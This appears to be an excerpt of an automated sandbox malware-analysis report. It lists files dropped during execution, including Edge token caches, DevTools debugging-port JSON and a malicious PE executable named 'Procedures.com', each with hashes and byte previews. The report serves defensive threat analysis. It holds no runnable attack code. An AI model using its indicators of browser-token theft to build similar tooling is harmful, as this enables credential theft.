                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f06befee-a15f-4204-943d-cb4b4976f678.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44616
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096143633957459
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fGDlNkExDcGoup1Xl3jVzXr2:z/Ps+wsI7ynEf6befochu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:3CDF8A9BE299BDDAB55B679E9498D364
                                                                                                                                                                                                                                                                                                  SHA1:B6880DEAB1D667F5FBE730ABDAB52F7DCD5E442D
                                                                                                                                                                                                                                                                                                  SHA-256:F5988E36B9040F2490598CF4674C2DF8F4092155713D4D6D1AFD5FCB51E139C2
                                                                                                                                                                                                                                                                                                  SHA-512:7E2AC40766A11B2B0A3846C9E977A199DC960400EAE3A744BA5DA4CBD610F51436FD14B9ADD7A8D5A6EEDD67DE6C3A41E35E8A261F0C74D11D84792699950278
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.855054237360262
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxtJxl9Il8ugd2UlKtP3qI6bw9q6uHERczd1rc:mKYVUlKtfuc9furU
                                                                                                                                                                                                                                                                                                  MD5:F0A7C1F7FF18F618001EB06B17AF30DB
                                                                                                                                                                                                                                                                                                  SHA1:8C8C28E9557F2D9B1BE470C5FCC98B7547110CF3
                                                                                                                                                                                                                                                                                                  SHA-256:BFAA70E5268B362E2C11A84699D99F8DBDAA6E189D79AAB8532072CF0A16E26B
                                                                                                                                                                                                                                                                                                  SHA-512:33D74B59BEAE18EB7EC4C35A7BB68C24CFB4EC32F27893026493CE8DB098CB49053A8893A8CC5B54E9F825C27EE6138C6D71645A302A94F3967C248B108DB5F3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.L.S.T.w.N.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.k.M.Z.R.9.n.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.005192931416091
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:2YR06u4+2kIAfsPj0LOsy1tVuG7Le9bLGkTI0z:21cFmsdt1+G3GKkThz
                                                                                                                                                                                                                                                                                                  MD5:03CFB83EBFC92B35AFF022915CA01F8A
                                                                                                                                                                                                                                                                                                  SHA1:9994EABCFBCDD8AE4763FFE8CBB6FE42CB54FFDA
                                                                                                                                                                                                                                                                                                  SHA-256:5A5E426656CB422BFE1BE622326A6979C5E37ABEC0299155D65E582CFE27956D
                                                                                                                                                                                                                                                                                                  SHA-512:A05D45F7C701DBB19D172B7322DE511D2467019E312388684836DFBB6CAE9AEF4902A46B1B932AC79144BDFC9B4EC38AD15BB17F3AE9837ECCABE2F4C0AFFB5C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.f.P.J.N.P.t.U.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.k.M.Z.R.9.n.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.906924226974215
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7x5wxl9Il8ugdkEMqaw3h3wK+3OAHkD6sqrqGBLud/vc:aoYtvq3wKOkD6PqO
                                                                                                                                                                                                                                                                                                  MD5:040D4BB3198D22A8C82495DDE7731D9D
                                                                                                                                                                                                                                                                                                  SHA1:DF3EB11B8DD631468A8A7FC9361EBCA516DAE0C0
                                                                                                                                                                                                                                                                                                  SHA-256:EBCDF8FE723016D24B5F50E1530AB7A9564DE812184D9C0163CCAD6314D61640
                                                                                                                                                                                                                                                                                                  SHA-512:A09B20C4302779D00ABF26C23A71B21CA9BE1CFDBCF41302B28AC001E0654A194124FE94F7F8828483EDA81CE3FAF4336D59B7B65EDE087599280D6669E67DF0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".l.c.o.D.Z.c.x.z.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.k.M.Z.R.9.n.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.397547379558348
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:6NnCF4HCQNnC8DdbC8ENnCALz9CAsNnCFdgEC4NnCk9HCRNnC2hDCVNnCQwCNNnA:6NrNyNGNOPN2NXYNxHNA
                                                                                                                                                                                                                                                                                                  MD5:FCC2444210E55539A6DB05EC59E93323
                                                                                                                                                                                                                                                                                                  SHA1:57B17BA92361B76EB093812CC3D7F13EF5A86433
                                                                                                                                                                                                                                                                                                  SHA-256:2E82CFDDB6BB03E5801943B2806B1EC69973613AC9434B12209A9D961784366E
                                                                                                                                                                                                                                                                                                  SHA-512:C1FCA259D790F5B0D7A0053E2EC405516424B23911245BE5D0B9DFB2EFF27B1832ED24FBBF4FD2161A95FD7C8EE6D5912339D3CBEE9CD73A07C809707AA933AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/46BE9ADF6B7C8900F82FE579922A547E",.. "id": "46BE9ADF6B7C8900F82FE579922A547E",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/46BE9ADF6B7C8900F82FE579922A547E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/D1C97884C5E7C2BB9C78227E2F992E7F",.. "id": "D1C97884C5E7C2BB9C78227E2F992E7F",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/D1C97884C5E7C2BB9C78227E2F992E7F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.387286688797216
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoCfk4TECfMfNaoCAC/YfNaoCpCvfNaoC3a6am0UrU0U8C31:6NnCfk4TECf4NnCAC/kNnCpCHNnCt0Uw
                                                                                                                                                                                                                                                                                                  MD5:D6B0A508DA616790AC174326A6659A07
                                                                                                                                                                                                                                                                                                  SHA1:326D31E091197D8F3B2C43B8B9CA272993F5D9ED
                                                                                                                                                                                                                                                                                                  SHA-256:54B0DDE1A89EF61F6783F439FACFF49C40CE3100A5032131FB5CFE12D7D36B26
                                                                                                                                                                                                                                                                                                  SHA-512:659EA93A0BE3CA0AFFD2AB8D554BBF00730DE3354A394C174E6E6C0F81D947376E2527D9C0FCBEBD9C69E9AB47492ABF338BFE8EF127A3CF4A41D3ACA75AC6EE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6DC204D306960A5AAA79981C8FDA712E",.. "id": "6DC204D306960A5AAA79981C8FDA712E",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6DC204D306960A5AAA79981C8FDA712E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/CAF92B14350718208A7CCF848D4C60B2",.. "id": "CAF92B14350718208A7CCF848D4C60B2",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/CAF92B14350718208A7CCF848D4C60B2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\139308\Procedures.com

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                  • Filename: 9EI7wrGs4K.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Wine.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: GoldenContinent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: Full-Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\139308\j

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):273750
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999303811507272
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:1KvEEvruhRDeI/GcvMoakx9K/vRg5ir1Tc/UE85jntD:2n0RyO70xkkK56ep85j1
                                                                                                                                                                                                                                                                                                  MD5:EE15AD7483051C844B95DD14CB16B4CA
                                                                                                                                                                                                                                                                                                  SHA1:3E0E0DB838B650D6F1302AA4CB6F3B7CC736EBDE
                                                                                                                                                                                                                                                                                                  SHA-256:AA221B76B3C00ADFB49BED18CDF4095A304A4FB468EAFD590F347552F37799BF
                                                                                                                                                                                                                                                                                                  SHA-512:A6BCA037DD588B0522DC5A2A9E04C91CB68FC9122715964BAF8E483FDDC683ACD921B7DC3F293C5BBF920D01F38CF9269E4EBE9F807F6982853E2EF16DF7B40E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:......b..7...0..d..["....w)..p...t.5. `.\v.Y*..k.6....gk84m..x:r:.0...>s|.<...i......+v..<-.3...@;.O..+.g..?...@.ab........T@..JNEb.z...........Y.ll..a*.WVr..aK%$..pSO....t..a2t...p.n.w..'.,QR*Rq.............#.....|..Gj.'^..J...1......%.1e-l..w...SD....!.l'.d.$...W..d.D[...1..A.x$..5...T.<.s.... ^....4..[....>.....b.v.1F.)...m.!Tc|...._.......k............^....P.#.....W..!I.(.c......O.A.gR.WU.....w..0.u.xbJ.... .M.tB...c.....4+..l.).......}...P1......2..I.o.v.$.~S.C].....1|...x*..05..A!...t,g.[..<..+.....> .......".....w.*.e. !o....7`.....r[4Y3X.8..6YK.......rdMp.......m...P......t.D#f).Fq.....I.Evl......W....Z.h.2;`[s.n".l%...3.r.....f,......!~..........p.8.Q...I|)..4Lj..a...;..W.._RB.[q.Ip.F.............a=.\M.........<...,96....%..3:J...y.P.."..0....8.j{.'...V.......I..A.c...TH..-.1h..o....5'.GJ.R.(........&.)+.....%[.y..j^....#..nBp...dX..o....c.o.,3GtL`..`....o..a:......;..U'...agk&.$_%P..Q.lVEL!).V.k0}..j.39.=0....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\22e60099-4945-43a4-a64d-8ed9ae6b77eb.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):70300
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.836652071119625
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:yExd3LurhMIBKe19FhAVmEz63lXv2os8VJvxmR5ukXz/M7tz:xrsd719umEO3lXvFs8Pi5uWz/M7tz
                                                                                                                                                                                                                                                                                                  MD5:2BD7BD2901DE70F520C41987E2730D3D
                                                                                                                                                                                                                                                                                                  SHA1:0B3A20AAF67ABB401F4DABD824DE249A1D7649C7
                                                                                                                                                                                                                                                                                                  SHA-256:47612542AD0E67791DB220A7843C41471062F66BBA30254D4AEC4F1F7D08E513
                                                                                                                                                                                                                                                                                                  SHA-512:B6394D310F3A82CD34DF987B10196156BF814EEAC8F7F3738D007A90CA31C38D182B366E89162618A249C5CDF376136A00ABD4F74FA0F87E81868A24B444318E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..*pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ*.>...i.v....A.CD|bfx....).o.g.....I....6...!....<.t*|"....PO*<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~.*.&........:]...*w.md./zkT.Z..F........,."7|.|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\38ae3094-0642-40b2-815e-60218eb9d221.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                  Malicious:false
